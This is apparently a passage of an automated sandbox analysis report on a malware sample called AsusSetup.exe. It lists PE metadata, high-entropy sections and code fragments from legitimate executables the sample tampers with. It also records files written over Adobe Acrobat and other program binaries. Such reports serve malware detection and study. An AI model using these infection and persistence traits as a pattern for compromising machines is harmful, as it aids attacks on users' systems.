Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: elevation_service.exe0.0.drStatic PE information: real checksum: 0x1bb29d should be: 0x24280a
Source: armsvc.exe.0.drStatic PE information: section name: .didat
Source: alg.exe.0.drStatic PE information: section name: .didat
Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .gehcont
Source: unpack200.exe.2.drStatic PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: _RDATA
Source: cookie_exporter.exe.2.drStatic PE information: section name: .00cfg
Source: cookie_exporter.exe.2.drStatic PE information: section name: .gxfg
Source: cookie_exporter.exe.2.drStatic PE information: section name: .retplne
Source: cookie_exporter.exe.2.drStatic PE information: section name: _RDATA
Source: identity_helper.exe.2.drStatic PE information: section name: .00cfg
Source: identity_helper.exe.2.drStatic PE information: section name: .gxfg
Source: identity_helper.exe.2.drStatic PE information: section name: .retplne
Source: identity_helper.exe.2.drStatic PE information: section name: _RDATA
Source: identity_helper.exe.2.drStatic PE information: section name: malloc_h
Source: setup.exe.2.drStatic PE information: section name: .00cfg
Source: setup.exe.2.drStatic PE information: section name: .gxfg
Source: setup.exe.2.drStatic PE information: section name: .retplne
Source: setup.exe.2.drStatic PE information: section name: LZMADEC
Source: setup.exe.2.drStatic PE information: section name: _RDATA
Source: setup.exe.2.drStatic PE information: section name: malloc_h
Source: msedgewebview2.exe.2.drStatic PE information: section name: .00cfg
Source: msedgewebview2.exe.2.drStatic PE information: section name: .gxfg
Source: msedgewebview2.exe.2.drStatic PE information: section name: .retplne
Source: msedgewebview2.exe.2.drStatic PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.drStatic PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.drStatic PE information: section name: _RDATA
Source: msedgewebview2.exe.2.drStatic PE information: section name: malloc_h
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .retplne
Source: Acrobat.exe.2.drStatic PE information: section name: .didat
Source: Acrobat.exe.2.drStatic PE information: section name: _RDATA
Source: AcroCEF.exe.2.drStatic PE information: section name: .didat
Source: AcroCEF.exe.2.drStatic PE information: section name: _RDATA
Source: msedge_proxy.exe.2.drStatic PE information: section name: .00cfg
Source: msedge_proxy.exe.2.drStatic PE information: section name: .gxfg
Source: msedge_proxy.exe.2.drStatic PE information: section name: .retplne
Source: msedge_proxy.exe.2.drStatic PE information: section name: _RDATA
Source: msedge_proxy.exe.2.drStatic PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: malloc_h
Source: notification_click_helper.exe.2.drStatic PE information: section name: .00cfg
Source: notification_click_helper.exe.2.drStatic PE information: section name: .gxfg
Source: notification_click_helper.exe.2.drStatic PE information: section name: .retplne
Source: notification_click_helper.exe.2.drStatic PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.drStatic PE information: section name: _RDATA
Source: notification_click_helper.exe.2.drStatic PE information: section name: malloc_h
Source: pwahelper.exe.2.drStatic PE information: section name: .00cfg
Source: pwahelper.exe.2.drStatic PE information: section name: .gxfg
Source: pwahelper.exe.2.drStatic PE information: section name: .retplne
Source: pwahelper.exe.2.drStatic PE information: section name: _RDATA
Source: pwahelper.exe.2.drStatic PE information: section name: malloc_h
Source: msedge_proxy.exe0.2.drStatic PE information: section name: .00cfg
Source: msedge_proxy.exe0.2.drStatic PE information: section name: .gxfg
Source: msedge_proxy.exe0.2.drStatic PE information: section name: .retplne
Source: msedge_proxy.exe0.2.drStatic PE information: section name: _RDATA
Source: msedge_proxy.exe0.2.drStatic PE information: section name: malloc_h
Source: pwahelper.exe0.2.drStatic PE information: section name: .00cfg
Source: pwahelper.exe0.2.drStatic PE information: section name: .gxfg
Source: pwahelper.exe0.2.drStatic PE information: section name: .retplne
Source: pwahelper.exe0.2.drStatic PE information: section name: _RDATA
Source: pwahelper.exe0.2.drStatic PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.2.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateBroker.exe.2.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.drStatic PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.2.drStatic PE information: section name: .didat
Source: maintenanceservice.exe.2.drStatic PE information: section name: .00cfg
Source: maintenanceservice.exe.2.drStatic PE information: section name: .voltbl
Source: maintenanceservice.exe.2.drStatic PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: _RDATA
Source: AcroCEF.exe0.2.drStatic PE information: section name: .didat
Source: AcroCEF.exe0.2.drStatic PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateOnDemand.exe.2.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.2.drStatic PE information: section name: .didat
Source: AppVLP.exe.2.drStatic PE information: section name: .c2r
Source: OneDriveSetup.exe.2.drStatic PE information: section name: .didat
Source: AdobeCollabSync.exe.2.drStatic PE information: section name: .didat
Source: AdobeCollabSync.exe.2.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_020652E3 push E9000001h; retf 0000h0_2_020652E8
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_020668CE push E9000001h; retn 0000h0_2_020668D3
Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_005368CE push E9000001h; retn 0000h6_2_005368D3
Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_005352E3 push E9000001h; retf 0000h6_2_005352E8
Source: C:\Windows\System32\FXSSVC.exeCode function: 9_2_004268CE push E9000001h; retn 0000h9_2_004268D3
Source: C:\Windows\System32\FXSSVC.exeCode function: 9_2_004252E3 push E9000001h; retf 0000h9_2_004252E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 10_2_022552E3 push E9000001h; retf 0000h10_2_022552E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 10_2_022568CE push E9000001h; retn 0000h10_2_022568D3
Source: AsusSetup.exeStatic PE information: section name: .reloc entropy: 7.909171977386322
Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.926374761621537
Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.932549984616171
Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.9341222464649634
Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.936210613832254
Source: identity_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.930826780785252
Source: setup.exe.2.drStatic PE information: section name: .reloc entropy: 7.934610105064463
Source: msedgewebview2.exe.2.drStatic PE information: section name: .reloc entropy: 7.9263254044138876
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: section name: .reloc entropy: 7.924953306161172
Source: 7zFM.exe.2.drStatic PE information: section name: .reloc entropy: 7.922154534505765
Source: 7zG.exe.2.drStatic PE information: section name: .reloc entropy: 7.917653876302211
Source: Acrobat.exe.2.drStatic PE information: section name: .reloc entropy: 7.930112475265825
Source: AcroCEF.exe.2.drStatic PE information: section name: .reloc entropy: 7.927047445796815
Source: msedge_proxy.exe.2.drStatic PE information: section name: .reloc entropy: 7.932362144356526
Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .reloc entropy: 7.936485765877424
Source: notification_click_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.934156734794212
Source: pwahelper.exe.2.drStatic PE information: section name: .reloc entropy: 7.930980815810094
Source: msedge_proxy.exe0.2.drStatic PE information: section name: .reloc entropy: 7.9323570258946345
Source: pwahelper.exe0.2.drStatic PE information: section name: .reloc entropy: 7.930982968179109
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: section name: .reloc entropy: 7.934064267523334
Source: AcroCEF.exe0.2.drStatic PE information: section name: .reloc entropy: 7.927041121094228
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: section name: .reloc entropy: 7.934056927244927
Source: MicrosoftEdgeUpdateSetup.exe.2.drStatic PE information: section name: .reloc entropy: 7.930261900063056
Source: OneDriveSetup.exe.2.drStatic PE information: section name: .reloc entropy: 7.86238024239603
Source: ADNotificationManager.exe.2.drStatic PE information: section name: .reloc entropy: 7.927064915263811
Source: AdobeCollabSync.exe.2.drStatic PE information: section name: .reloc entropy: 7.894424384142644
Source: CRLogTransport.exe.2.drStatic PE information: section name: .reloc entropy: 7.928168502137922

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\26169d80e67cd874.binJump to behavior
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
